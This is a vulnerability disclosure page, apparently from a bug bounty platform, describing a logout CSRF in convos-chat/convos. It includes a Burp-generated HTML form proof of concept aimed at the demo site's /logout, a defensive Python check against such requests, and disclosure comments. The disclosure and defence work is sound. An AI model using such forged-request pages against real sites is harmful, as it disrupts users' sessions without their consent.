Cross-Site Request Forgery (CSRF) in convos-chat/convos

Valid

Reported on

Dec 11th 2021


Description

An attacker is able to log out a user if a logged-in user visits the attacker's website.

Proof of Concept

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://demo.convos.chat/logout">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Impact

This vulnerability allows an attacker to force users to log out unintentionally.

More Detail

One way a GET logout endpoint can be abused: someone (a competitor, perhaps) places an image tag with src="<your logout link>" anywhere on the internet, and if a user of your site stumbles upon that page, they are unknowingly logged out. This is why logout should be a POST that carries a CSRF token.
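As an added defensive example (not Convos's own code, and not the fix the maintainers merged), the following Python sketch implements the rule the paragraph asks for on the server side: /logout only ends a session on a POST that carries a per-session token, with Fetch Metadata and Origin headers as extra checks. The function names, the sample session and the header values are all constructed for the example.

```python
import hmac
import secrets


def issue_csrf_token(session: dict) -> str:
    """Mint one random per-session CSRF token and reuse it for that session."""
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def logout_allowed(method: str, headers: dict, form: dict, session: dict,
                   site_origin: str) -> tuple[bool, str]:
    """Decide whether a /logout request may end the session.

    Header names are assumed lower-case. Returns (allowed, reason) so the
    caller can log rejections as suspected CSRF attempts.
    """
    # 1. A GET must have no side effects: an <img src> or a plain <form>
    #    like the PoC above reaches it from any origin.
    if method.upper() != "POST":
        return False, "logout requires POST"
    # 2. Fetch Metadata: modern browsers label cross-site requests;
    #    'none' means a direct navigation (URL bar/bookmark) and is allowed.
    sfs = headers.get("sec-fetch-site")
    if sfs is not None and sfs not in ("same-origin", "none"):
        return False, f"rejected Sec-Fetch-Site={sfs}"
    # 3. Origin header as a second, independent check when present.
    origin = headers.get("origin")
    if origin is not None and origin != site_origin:
        return False, f"rejected Origin={origin}"
    # 4. Synchronizer token: present and equal to the session's copy.
    #    compare_digest keeps the comparison constant-time.
    expected = session.get("csrf_token", "")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False, "missing or invalid CSRF token"
    return True, "ok"


if __name__ == "__main__":
    site = "https://demo.convos.chat"
    sess = {"user": "alice"}           # constructed sample session
    token = issue_csrf_token(sess)
    # The PoC above: a GET /logout submitted from a third-party page.
    print(logout_allowed("GET", {"sec-fetch-site": "cross-site"}, {}, sess, site))
    # A cross-site POST without the token.
    print(logout_allowed("POST", {"origin": "https://attacker.example"}, {}, sess, site))
    # The site's own logout button carrying the token.
    print(logout_allowed("POST", {"origin": site}, {"csrf_token": token}, sess, site))
```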

Note

While this cannot harm a user's account, it can be a great annoyance and is a valid CSRF.

We are processing your report and will contact the convos-chat/convos team within 24 hours. (2 months ago)
Devendra Bhatla
2 months ago

Researcher


@admin Please contact the maintainer at contact@convos.chat.

We created a GitHub Issue asking the maintainers to create a SECURITY.md (2 months ago)
Jamie Slome
a month ago

Admin


@dev696 - I have commented on the GitHub Issue! I have shared the report URL with them if they want to view the report directly. Otherwise, once they have added an e-mail to the SECURITY.md, they will receive a magic link to access the page.

Devendra Bhatla
a month ago

Researcher


@Jamie, I believe we can consider the shared email "contact@convos.chat". You can share all the details as this is the main contact. Also, the URL is private and cannot be viewed. Thanks for your support as always.

We have contacted a member of the convos-chat/convos team and are waiting to hear back (a month ago)
Jamie Slome
a month ago

Admin


Sorted! 🎊

A convos-chat/convos maintainer validated this vulnerability (a month ago)
Devendra Bhatla has been awarded the disclosure bounty
The fix bounty is now up for grabs
A convos-chat/convos maintainer confirmed that a fix has been merged on a2d265 (a month ago)
The fix bounty has been dropped
ChatSidebar.svelte#L233 has been validated
A convos-chat/convos maintainer
a month ago

Maintainer


Thanks for reporting this through e-mail, instead of posting it online before having a chance to fix it.

I did consider this a minor issue. I think even bigger sites like Google also do not protect the /logout endpoint. Nevertheless, the fix was simple to add, so why not? :)

KhanhCM
a month ago

Hey @dev696,

A real researcher will not just copy all the content from other reports. You should try to write your reports by yourself.

Furthermore, the severity for this vulnerability is not High, it's Medium (CVSS from 4.3 to 6.5, maybe). You can check it on some reports or CVEs. Convos's users will be shocked if they know that their app has a High vulnerability when the impact is just logging out a user, with no effect on the account, just an annoyance!